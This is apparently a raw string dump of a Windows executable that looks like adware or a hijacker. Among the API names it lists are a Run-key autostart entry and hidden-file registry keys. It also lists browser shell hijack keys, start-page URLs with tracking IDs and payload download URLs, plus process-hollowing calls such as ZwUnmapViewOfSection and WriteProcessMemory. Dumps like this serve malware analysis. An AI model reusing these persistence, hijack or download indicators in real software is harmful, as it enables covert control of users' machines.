GetStringTypeW
GetSubMenu
GetSysColor
GetSysColorBrush
GetSystemDirectoryA
GetSystemInfo
GetSystemMenu
GetSystemMetrics
GetSystemPaletteEntries
GetSystemTimeAsFileTime
GetTempPathA
GetTextExtentPoint32A
GetTextMetricsA
GetThemeAppProperties
GetThemeBackgroundContentRect
GetThemeBackgroundRegion
GetThemeBool
GetThemeColor
GetThemeDocumentationProperty
GetThemeEnumValue
GetThemeFilename
GetThemeFont
GetThemeInt
GetThemeIntList
GetThemeMargins
GetThemeMetric
GetThemePartSize
GetThemePosition
GetThemePropertyOrigin
GetThemeRect
GetThemeString
GetThemeSysBool
GetThemeSysColor
GetThemeSysColorBrush
GetThemeSysFont
GetThemeSysInt
GetThemeSysSize
GetThemeSysString
GetThemeTextExtent
GetThemeTextMetrics
GetThreadContext
GetThreadLocale
GetTickCount
GetTopWindow
GetUserDefaultLCID
GetUserObjectInformationA
GetVersion
GetVersionExA
GetWindow
GetWindowDC
GetWindowLongA
GetWindowOrgEx
GetWindowPlacement
GetWindowRect
GetWindowsDirectoryA
GetWindowTextA
GetWindowTextLengthA
GetWindowTheme
GetWindowThreadProcessId
GetWinMetaFileBits
;g<E=Y=p>
</<G<f<~<
GH+D$	
GlobalAddAtomA
GlobalAlloc
GlobalDeleteAtom
GlobalFindAtomA
GlobalFlags
GlobalFree
GlobalGetAtomNameA
GlobalHandle
__GLOBAL_HEAP_SELECTED
GlobalLock
GlobalReAlloc
GlobalSize
GlobalUnlock
=;>G>N>X>j>z>
Google Chrome
Google Chrome.lnk
<*<G<R<}<
Graphics
+Graphics
GrayStringA
GREEK_CHARSET
GroupIndexlJA
;$;G;S;
`h````
;';H;|;
Handled
HANGEUL_CHARSET
\hao123
HaoZip=1
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
HEBREW_CHARSET
Height
HelpContext
HelpFile|
:	HelpIntfs
:	HelpIntfs	
HelpKeywordlJA
HelpType
<H<g<Z=h=
`h`hhh
HH:mm:ss
HHtpHHtl
_Hide.exe
HideProgress=0
HideSelection
HitTestThemeBackground
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
HKEY_USERS
;%;);H;m;
H:mm:ss
HorzScrollBar
HorzScrollBar|
Host: 
HSVHWtgHHtF
	htKeyword	htContext
htmlfile\shell\
htmlfile\shell\e\command\
http://
HTTP/1.0
http://1.soso56.com/gswb_1454_7654_356.jpg
HttpAddRequestHeadersA
http://d2.freep.cn/3tb_140810210616ab0y536124.jpg
http://d2.freep.cn/3tb_140818090840mfgc537913.jpg
http://d2.freep.cn/3tb_140818091837jdlh537913.jpg
http://d2.freep.cn/3tb_140818093422ncpr537913.jpg
http://d3.freep.cn/3tb_140818092254lkmy537913.jpg
http://d3.freep.cn/3tb_140818093611ej63537913.jpg
http://d3.freep.cn/3tb_1408180948596rik537913.jpg
http://jifendownload.2345.cn/jifen_2345/p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
HttpOpenRequestA
HttpQueryInfoA
https://
HttpSendRequestA
HTTP\shell\
HTTP\shell\e\command\
https\shell\
https\shell\e\command\
http://www.12000.com.cn/asdqw_3104-48740.jpg
http://www.2345.com/?k98792151
http://www.duba.com/?un_2_445816
;!<H<U<\<{<
;~hu	3
hWj@_;
?*?/?H?X?i?z?
_hypot
=&=-=i=
IChangeNotifierD
ICustomHelpViewerD
.idata
IDesignerHook
IDesignerNotifyD
	IDispatchD
IDockManagerD
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
IEFav=1
IEHome=1
ie.log
IExtendedHelpViewer
Ignore
IgnoreFontProperty
IHelpManagerD
IHelpSelectorD
IHelpSystemD
Ih;J4u
IHTMLElementCollectiont
IInterface
ImageIndex
ImageList_Add
ImageList_BeginDrag
ImageList_Create
ImageList_Destroy
ImageList_DragEnter
ImageList_DragLeave
ImageList_DragMove
ImageList_DragShowNolock
ImageList_Draw
ImageList_DrawEx
ImageList_EndDrag
ImageList_GetBkColor
ImageList_GetDragImage
ImageList_GetIconSize
ImageList_GetImageCount
ImageList_Read
ImageList_Remove
ImageList_ReplaceIcon
ImageList_SetBkColor
ImageList_SetDragCursorImage
ImageList_SetIconSize
ImageList_Write
ImageList_WriteEx
Images
Images80D
imAlpha
imClose
	imDisable
imDontCare
ImeMode
ImeName<
ImgList
imHira
imKata	imChinese
imm32.dll
ImmGetCompositionStringA
ImmGetContext
ImmGetConversionStatus
ImmIsIME
ImmNotifyIME
ImmReleaseContext
ImmSetCompositionFontA
ImmSetCompositionWindow
ImmSetConversionStatus
ImmSetOpenStatus
imOpen
imSAlpha
imSHanguel	imHanguel
imSKata
	Incrementh
InflateRect
InfluenceRect
INFNAN
IniFiles
InitCommonControlsEx
InitializeCriticalSection
InitializeCriticalSectionAndSpinCount
InitializeFlatSB
InsertMenuA
InsertMenuItemA
Integer
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
InternetCloseHandle
InternetConnectA
Internet     Explorer.lnk
Internet    Explorer.lnk
Internet Explorer_Server
InternetGetCookieA
InternetOpenA
InternetOpenUrlA
InternetReadFile
InternetSetCookieA
InternetShortcut\shell\
InternetShortcut\shell\e\command\
IntersectClipRect
IntersectRect
Interval
InvalidateRect
invalid string position
IOleControlD
IOleFormD
IOleInPlaceActiveObject
IOleInPlaceObject
IOleObjectD
IOleWindowD
IPerPropertyBrowsingD
IPersistD
IPersistStream0FA
IPersistStreamInit`FA
IPictureD
IsAccelerator
IsAppThemed
IsBadCodePtr
IsBadReadPtr
IsBadWritePtr
IsChild
IsControl
IsDebuggerPresent
IsDialogMessageA
IsEqualGUID
IsIconic
ISpecialWinHelpViewer
IsRectEmpty
IsThemeActive
IsThemeBackgroundPartiallyTransparent
IsThemeDialogTextureEnabled
IsThemePartDefined
IStringsAdapterD
IsValidCodePage
IsWindow
IsWindowEnabled
IsWindowVisible
IsZoomed
< <(<I<U<r<z<
"J333333
j8j ^V
JanFebMarAprMayJunJulAugSepOctNovDec
January
"J"C3333
JOHAB_CHARSET
;$;J;Q;
JumpID("","%s")
<,<;<K<
kD$PdP
kD$TdP
kernel32
KERNEL32
kernel32.dll
Kernel32.dll
KERNEL32.dll
KERNEL32.DLL
KeyPreview
<+=K=i=
KillTimer
;k;o;s;w;{;
>%>)>->K>O>S>w>
?.?K?P?j?o?
;K<P<\<k<w<;=G=T=f=s=
KuGou=0
KuWo=0
KWindows
;K;X;g;r;
~KxI[)
;l<\=|=
L$0_^]
L$49l$4}
\$L9|$
Label1
Label2
Label2 
Label3
Label3$
Label4
Layout
layout text
LCMapStringA
LCMapStringW
L$DWQV
LeaveCriticalSection
LineTo
Link Source
Link Source Descriptor
ListActns
>,?L?]?i?x?
:?:L:[:j:y:
LoadBitmapA
LoadCursorA
LoadIconA
LoadKeyboardLayoutA
LoadLibraryA
LoadLibraryExA
LoadMenuA
LoadResource
LoadStringA
LocalAlloc
LocalFree
LocalReAlloc
LocalSize
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
LockResource
LongWord
L$$Ph@
L$$PQh
LPtoDP
<l=p=t=x=|=
L$<RPQ
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrcpyn
lstrcpynA
lstrlenA
lstrlenW
l$ UPVQ
maAutomatic
maBottomToTop
MAC_CHARSET
Magellan MSWHEEL
MAINICON
maLeftToRight
maManual
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
maNone
maParent
MAPI32.DLL
MapVirtualKeyA
MapWindowPoints
Margin
maRightToLeft
MaskBlt
maTopToBottom
	MaxHeight
	MaxHeightT
	MaxLength
MaxWidth
MaxWidthT
mbBarBreak
mbBreak
mbLeft
mbMiddle
mbNone
mbRight
MDICLIENT
m/d/yy
M/d/yy
MenuAnimation
MenuItemFromPoint
Menus\'D
MessageBoxA
mhtmlfile\shell\
mhtmlfile\shell\e\command\
Microsoft Visual C++ Runtime Library
	MinHeight
	MinHeightT
MinWidth
.mixcrt
MM/dd/yy
mmmm d, yyyy
:mm:ss
ModifyMenuA
Monday
MonitorFromPoint
MonitorFromRect
MonitorFromWindow
MousePos
MouseZ
MoveFileA
MoveFileExA
MoveToEx
MoveWindow
Movie=0
@Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
mscoree.dll
MsgWaitForMultipleObjects
MSH_SCROLL_LINES_MSG
MSHTML
MSH_WHEELSUPPORT_MSG
MS Sans Serif
MS Shell Dlg
__MSVCRT_HEAP_SELECT
MSWHEEL_ROLLMSG
MS_WINHELP
>">m>u>{>
MulDiv
MultiByteToWideChar
MultiMon
\MusicFM.lnk
<#=.=N=
n0SSSSU
Native
nComCtrls
Neutral
 new[]
	NewHeight
	NewTarget
NewWidth
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
notepad.exe
NoToAll
November
ntdll.dll
NTDLL.DLL
NtReadVirtualMemory
;#;/;<;N;T;`;t;|;
(null)
;,;;;O;
Object Descriptor
ObjectFromLresult
ObjectLink
ObjectMenuItem
October
odComboBoxEdit
odDisabled	odChecked	odFocused	odDefault
odGrayed
odHotLight
odInactive	odNoAccel
odNoFocusRect
odReserved1
odReserved2
odSelected
OEM_CHARSET
OEMConvert
OemToCharA
OffsetRect
OffsetViewportOrgEx
<O<g<y<
OldCreateOrder
OldCreateOrder<)D
ole32.dll
Oleacc.dll
oleaut32.dll
OLEAUT32.dll
OleConst
OleCreateFontIndirect
OleCreatePictureIndirect
OleCreatePropertyFrame
OleCtrls
oledlg.dll
OleDraw
OleFlushClipboard
OleInitialize
OleIsCurrentClipboard
OleLoadPicture
olepro32.dll
OLEPRO32.DLL
OleRun
OleServer
	OleServer
OleSetMenuDescriptor
OleStr
OleUninitialize
OleVariant
`omni callsig'
OnActivate
OnAdvancedDrawItem
OnCanResize
OnChange
OnClick
OnClose
OnCloseQuery@
OnConstrainedResize
OnContextPopup
OnCreate
OnDblClick
OnDeactivate
	OnDestroy
OnDockDrop
OnDockOver
OnDragDrop
OnDragOver8
OnDrawItem(&D
	OnEndDock8
	OnEndDockD
	OnEndDrag
OnEnter
OnExit
OnGetSiteInfo
OnHelp
OnHidet
	OnKeyDown
OnKeyPress
OnKeyUp
OnMeasureItem
OnMouseDown
OnMouseEnter
OnMouseLeave
OnMouseMove
	OnMouseUp
OnMouseWheelDownX
OnMouseWheelUp
OnMouseWheelX
OnPaint
OnPopup
OnResize8
OnShortCut
OnShow
OnShowSV
OnStartDock
OnStartDrag
OnTimer
OnTimerSV
OnUnDock
&Open,0,2
OpenEventA
OpenFile
OpenPrinterA
OpenProcess
OpenThemeData
operator
<O=V=l=p=t=x=|=
	OwnerDraw
OwnerLink
<-<@<`<o<z<
:(;:;p;
:$:(:P:
paCenter
paLeft
ParentBiDiMode
ParentBiDiMode<
ParentBiDiModed%D
ParentColor
ParentColor<
ParentCtl3D
ParentFont
ParentFont0
ParentShowHint
ParentShowHint(
paRight
__pascal
password
PasswordChar
PatBlt
; path=/
Path=C:\Program Files\
PathFileExistsA
PathFindFileNameA
PathIsDirectoryA
PathMatchSpecA
PathRemoveFileSpecA
.PAVCException@@
.PAVCMemoryException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCUserException@@
PCMgr=0
PCMgr=1
PeekMessageA
Ph_^][Y
Pitch<
PixelsPerInch
`placement delete closure'
`placement delete[] closure'
PlayEnhMetaFile
Please contact the application's support team for more information.
pmBlack
pmCopy	pmNotCopy
pmMaskNotPen
pmMaskPenNot
pmMask	pmNotMask
pmMerge
pmMergeNotPen
pmMergePenNot
pmNotMerge
pmNotXor
pmWhite
?,?P?n?
poDefaultPosOnly
poDefaultSizeOnly
poDesigned	poDefault
poDesktopCenter
poMainFormCenter
poNone
poOwnerFormCenter
poPrintToFit
poProportional
	PopupMenu
	PopupMenu0
poScreenCenter
Position<
Position 
PostMessageA
PostQuitMessage
PostThreadMessageA
PPPPhd
PPPPPPPP
ppxxxx
PQRVWS
P.reloc
PreviewPages
Printers
PrintScale
Process32First
Process32Next
ProgIDFromCLSID
Program: 
program internal error number is %d. 
<program name unknown>
P.rsrc
psClear
psDash
psDashDotDot
psDot	psDashDot
psInsideFrame
psSolid
P?:S?u
PtInRect
__ptr64
PtVisible
- pure virtual function call
=%=P=W=
PWVWWW
;$<Q<|<
Q<]_^[
qComConst
: ;Q;[;k;q;
  QQIE
&qqpassword=  
QQPCTray.exe
QQQQQQQQSV
QQQQQQQQSVW
QQQQQQQS
QQQQQQSVW3
QQQQQSVW
QQQQSV
QQQQSVW
QQQQSVW3
QQSVWd
QQSVWh
QQSVWj
QSUVWj
QTypInfo
QueryPerformanceCounter
:Q:V:d:
R0_^[]
R0]_^[
R0Z_^[
	RadioItem
RaiseException
RARCloseArchive
RAROpenArchiveEx
RARProcessFile
RARReadHeader
RARSetCallback
RARSetPassword
R ;C0|
R,;C4}!
=)>;>R>d>
`.rdata
.rdata
ReadFile
ReadOnly
ReadProcessMemory
RealizePalette
Rebuild
RectVisible
RedrawWindow
REG_BINARY - 
RegCloseKey
RegCreateKeyA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteValueA
RegDisableReflectionKey
REG_DWORD - DWORD
RegEnableReflectionKey
RegEnumKeyA
RegEnumValueA
RegFlushKey
RegisterAutomation
RegisterClassA
RegisterClassExA
RegisterClipboardFormatA
RegisterHotKey
RegisterWindowMessageA
REG_MULTI_SZ - 
REG_NONE - 
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
REG_REG_EXPAND_SZ - 
RegSetValueExA
RegStr
REG_SZ - 
ReleaseCapture
ReleaseDC
RemoteMachineName
RemoveDirectoryA
RemoveMenu
RemovePropA
ResetEvent
Resize
RestoreDC
__restrict
ResumeThread
RHelpIntfs
riched20.dll
RichEdit
RichEdit Text and Objects
,\Richt
Rich Text Format
rin9.com
<r==?i?q?y?
"RTLConsts
RtlMoveMemory
RtlUnwind
runtime error 
Runtime Error!
Runtime error     at 00000000
RUSSIAN_CHARSET
=r>v>z>~>
:"%s".
S`]_^[
S,_^[]
S$_^[]
S	_^[]
S0_^[]
;s0t=;
S8_^[]
sActiveX
Safe=0
SafeArrayCreate
SafeArrayGetLBound
SafeArrayGetUBound
SafeArrayPtrOfIndex
Saturday
SaveDC
`scalar deleting destructor'
Scaled
ScaleViewportExtEx
ScaleWindowExtEx
ScreenSnap
ScreenToClient
scripting.FileSystemObject
ScrollWindow
SdZ]_^[
Selected
SelectObject
SelectPalette
SendDlgItemMessageA
Sender
SendMessageA
SendMessageTimeoutA
September
SetActiveWindow
SetBkColor
SetBkMode
SetBrushOrgEx
SetCapture
SetClassLongA
SetCursor
SetDIBColorTable
SetEndOfFile
SetEnhMetaFileBits
SetErrorMode
SetEvent
SetFileAttributesA
SetFilePointer
SetFocus
SetForegroundWindow
SetHandleCount
SetLastError
SetLayeredWindowAttributes
SetMapMode
SetMenu
SetMenuDefaultItem
SetMenuInfo
SetMenuItemBitmaps
SetMenuItemInfoA
SetParent
SetPixel
SetPropA
SetRect
SetROP2
SetScrollInfo
SetScrollPos
SetScrollRange
SetStdHandle
SetStretchBltMode
SetTextColor
SetThemeAppProperties
SetThreadContext
SetThreadLocale
SetTimer
Settings
SetUnhandledExceptionFilter
SetViewportExtEx
SetViewportOrgEx
SetWaitableTimer
SetWindowExtEx
SetWindowLongA
SetWindowOrgEx
SetWindowPlacement
SetWindowPos
SetWindowRgn
SetWindowsHookExA
SetWindowTextA
SetWindowTheme
SetWinMetaFileBits
SHDocVw
shell32.dll
SHELL32.dll
*ShellAPI
ShellExecuteExW
Shell_NotifyIconA
Shell_TrayWnd
SHGetSpecialFolderPathA
SHIFTJIS_CHARSET
(ShlObj
shlwapi.dll
Shlwapi.dll
SHLWAPI.dll
ShortCut
ShortCutText
ShortInt
ShowAccelChar
ShowCursor
ShowHint
ShowHint<
ShowOwnedPopups
ShowScrollBar
ShowWindow
ShowWindowAsync
~#ShP5B
SING error
Single
SizeofResource
Smallint
Smooth<
SnapBuffer|
sO;>|C;~
software
Software\Borland\Delphi\Locales
SOFTWARE\Borland\Delphi\RTL
Software\Borland\Locales
Software\Microsoft\Internet Explorer\Main
SoHu=0
Source
Source	TMenuItem
%s (%s)
s[S;7|G;w
ssCtrl
ssDouble
ssFlat
ssHotTrack
ssLeft
ssMiddle
	ssRegular
ssRight
ssShift
SS@SSPVSS
_SSSSU
s(;~ t8
StartAuto=1
Start Page
StdActns
__stdcall
StdCtrls
StdCtrls'
StdCtrls6
StdVCL
StretchBlt
`string'
String
StringFromCLSID
Strings
string too long
Style<
SubMenuImages
Sunday
SunMonTueWedThuFriSat
SusWnd
;s<w<{<
sx;P`u
S$_^[Y]
SYMBOL_CHARSET
SyncObjs
SysAllocStringLen
SysConst
SysFreeString
SysInit
SysPager
SysReAllocStringLen
System
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
SystemParametersInfoA
SysUtils
>"?>?t?
<*t"<0r=<9w9i
t0WWWWW
t@_^]3
t	9p$u
t^9(uZ
t9;wlt4
TabbedTextOutA
TabOrder
TabStop
taCenter
TActionLinkSV
TAdapterNotifier
TAdvancedMenuDrawItemEvent
tagEXCEPINFO 
tagMULTI_QI
taLeftJustify
TAlign
TAlignment
TAnchorKind
TAnchors
TApplication
Target
TargetPath
taRightJustify
TaskbarCreated
taskmgr.exe
tb9} u
TBaseDragControlObject
TBaseDragControlObjectd
TBasicAction
TBasicActionLink
	TBevelCut
TBevelEdge
TBevelEdges
TBevelKind
	TBiDiMode
TBitmap
TBitmapCanvas
TBitmapCanvas0DB
TBitmaph
TBitmapImage
tbLeftButton
TBorderIcon
TBorderIcons
TBorderStyle
TBorderWidth
tbRightButton
TBrush
TBrushStyle
tBSh|_C
t$;C8u
TCanResizeEvent
TCanvas
TCanvasD
TCanvash
TCaption
TChangeLinkL
TClassFinder
TClipboardFormats
TCloseAction
TCloseEvent
TCloseQueryEvent
TColor
TCommonDialog
TCommonDialog|
TComponent
TComponentName
TConnectKind
TConstrainedResizeEvent
TConstraintSize
TContainedAction
TContextPopupEvent
TControl
TControlActionLink
TControlCanvas
TControlScrollBar
TControlScrollBar\
TControlt
TConversionFormat
TConversionX
TCriticalSection
TCursor
TCustomAction
TCustomActionList
TCustomActionList,
TCustomAdapter
TCustomControl
TCustomControl8
TCustomDockForm
TCustomEdit
TCustomEdit0
TCustomForm
TCustomImageList
TCustomLabel
TCustomMemoryStream
TCustomVariantType
TCustomVariantType`
tD9_Pt?
tD9(u@
TDefaultMonitor
TDockDropEvent
TDockOverEvent
	TDockTree
	TDockZone
TDragControlObject
TDragControlObjectEx
TDragDockObject
TDragDockObjectD
TDragDockObjectEx
TDragDropEvent
	TDragKind
	TDragMode
TDragObject
TDragOverEvent
TDragState
t#;^dt
TEditCharCase
tehDL@
\TemporaryFile
\....\TemporaryFile
TEndDragEvent
TerminateProcess
	TErrorRec
TEventDispatch
TExceptRec
TextHeight
TextOutA
TFileFormat
TFileFormatsList
TFiler
TFileStream8WA
:T:f:l:
TFont4
TFontAdapter
TFontCharset
	TFontName
TFontPitch
TFontStyle
TFontStyles
TForm 
TForm1
TForm1L
TFormBorderStyle
TFormStyle
TGetSiteInfoEvent
TGraphic
TGraphicControl
TGraphicsObject0
TGraphicsObjectX
THAI_CHARSET
THandleStream
THelpContext
THelpEvent
THelpManager
	THelpType
THelpViewerNode
Theme manager 
THintAction
THintAction(
	THintInfo@
THintWindow
This application has requested the Runtime to terminate it in an unusual way.
__thiscall
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
This program must be run under Win32
t>Ht Ht
t+Ht$Ht
t%HtIHtm
	ThumbSize
Thursday
t`h@WE
TIconImage
TIdentMapEntry
TImageIndex
TImeMode
TImeName
Timer1
Timer1Timer
	TIntConst
TInterfacedObject
TInterfacedPersistent
t%Jt?Jt[
	TKeyEvent
TKeyPressEvent
TLabel
TLabelP
tlBottom
tlCenter
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
T$LURV
	TMainMenu
TMemoryStream
TMenu4-D
TMenuActionLink
TMenuAnimation
TMenuAnimations
TMenuAutoFlag
TMenuBreak
TMenuChangeEvent
TMenuDrawItemEvent
	TMenuItem
TMenuItemAutoFlag
	TMenuItem@)D
TMenuItemStack
TMenuMeasureItemEvent
	TMetafile
	TMetafile(
TMetafileCanvas
TMetafileImage
TMonitor
TMouse
TMouseButton
TMouseEvent
TMouseMoveEvent
TMouseWheelEvent
TMouseWheelUpDownEvent
$TMultiReadExclusiveWriteSynchronizer
TNotifyEvent
TObject
TObject(
TObject	
TObjectList
TOleControl
TOleGraphic
TOleGraphic,oE
TOleServer
TOleServer|dE
ToolbarWindow32
ToolWin
TOrderedList
TOwnerDrawState
TPatternManagerSV
TPenMode
	TPenStyle
TPersistent
TPicture
TPictureAdapter,oE
TPoint
TPopupAlignment
TPopupList
TPopupMenu
	TPosition
TPrintScale
TPropFixup
TPropIntfFixup
TPUtilWindow
tq9w(tlSj
tR99u2
TrackButtond%D
Tracking
TrackMouseEvent
TrackPopupMenu
TranslateAcceleratorA
TranslateMDISysAccel
TranslateMessage
Transparent
TransparentColor
TransparentColorValue
TrayNotifyWnd
TReader
	TRegGroup
TRegGroups
TResourceManager
TResourceStream
tr;s@u
TScreen
TScrollBarInc
TScrollBarStyle
TScrollingWinControl
TServerEventDispatch
TSharedImage
TShiftState
	TShortCut
TShortCutEvent
TShortCutList
	TSiteList
TSizeConstraints
t#SSUP
TStack
TStartDockEvent
TStartDragEvent
TStreamAdapter
TStreamLVA
TStringItem
TStringList
TStringListlUA
TStrings
TSynchroObject
T$ +T$
T$$+T$
	TTabOrder
TTextLayout
TThemeServices
+ttHHtd
TThreadListdQA
TThreadLocalCounter
TTimer
TTrackButton
t.;t$$t(
Tuesday
TUnDockEvent
TURKISH_CHARSET
;t$,v-
=T>]?v?
TVariantArray
t$$VSS
tVSVWU
tvWWWWU
TWinControl
TWinControl<
TWinControlActionLink
TWindowState
TWinHelpViewer
TWMKey
T$$WRV
t+WWVPV
 Type Descriptor'
`typeof'
=,=U=]={=
u*;~8u
`udt returning'
u-hOmC
u@hsvB
uL9=|+A
- unable to initialize heap
- unable to open console device
__unaligned
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UnhookWindowsHookEx
UninitializeFlatSB
\uninst.exe
Unknown
Unknown exception
unrar.dll
UnrealizeObject
UnregisterClassA
UnregisterHotKey
UpdateWindow
UQPXY]Y[
uRFGHt
UrlMon
URPQQhl
UseDockManager
user32
USER32
user32.dll
User32.dll
USER32.dll
USER32.DLL
User-Agent: DownJet1.0
UTypes
u$;~|u
\$(UVW
uxtheme.dll
ValidateRect
VarAdd
VarAnd
VarBoolFromStr
VarBstrFromBool
VarBstrFromCy
VarBstrFromDate
VarCmp
VarCyFromStr
VarDateFromStr
VarDiv
VarI4FromStr
Variant
VariantChangeType
VariantChangeTypeEx
VariantClear
VariantCopy
VariantInit
Variants
VarIdiv
VarMod
VarMul
VarNeg
VarNot
VarR4FromStr
VarR8FromStr
VarSub
$VarUtils
VarXor
`vbase destructor'
`vbtable'
VC20XC00U
`vcall'
vcltest3.dll
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
VerQueryValueA
version.dll
VertScrollBar
`vftable'
VirtualAlloc
VirtualAllocEx
`virtual displacement map'
VirtualFree
VirtualFreeEx
VirtualProtectEx
VirtualQuery
VirtualQueryEx
Visible
Visible<
vMenus
v	N+D$
,&[vrH
VWhsvB
VWuBh<
:;;w;1<|<
WaitForSingleObject
WaitMessage
=,>W>d>
Wednesday
WheelDelta
w]hsvB
+WH+W@
WideCharToMultiByte
WideString
Width<
Widthd
WindowFromPoint
WindowMenu
Windows
WindowState<)D
WinExec
WinHelpA
WinHelpViewer
WinInet
?WinInet
wininet.dll
WININET.dll
WINNLSEnableIME
WINSPOOL.DRV
WM_HTML_GETOBJECT
WndProcPtr%.8X%.8X
woqqqainima de a
WordWrap
Wow64DisableWow64FsRedirection
Wow64RevertWow64FsRedirection
\WPS Office 
(wqt\HHtS
WriteConsoleA
WriteConsoleW
WriteFile
WritePrivateProfileStringA
WriteProcessMemory
wshom.ocx
WshShell
wsMaximized
wsMinimized
wsNormal
wsprintfA
WTWindow
WWinSpool
WwktZ=
www.55188.com
wwwwww
wwwwwwwwwwwwww
>(???X?
;X0t@S
XD;PHu
xppwpp
xpxxxx
=;=X=w=
;?=X=x=
YesToAll
YStrUtils
>=Yt/j
_^[YY]
_^][YY
Y_^[Y]
YYF;5`
YYF;5@
\yyfm0529
YYu-9D$
YYuTVWh
$YZ_^[
$YZ]_^[
YZ]_^[
YZXtm1
?#?)?z?
(Z]_^[
$Z]_^[
Z9K|uU
ZTUWVSPRTj
ZwQueryInformationProcess
ZwUnmapViewOfSection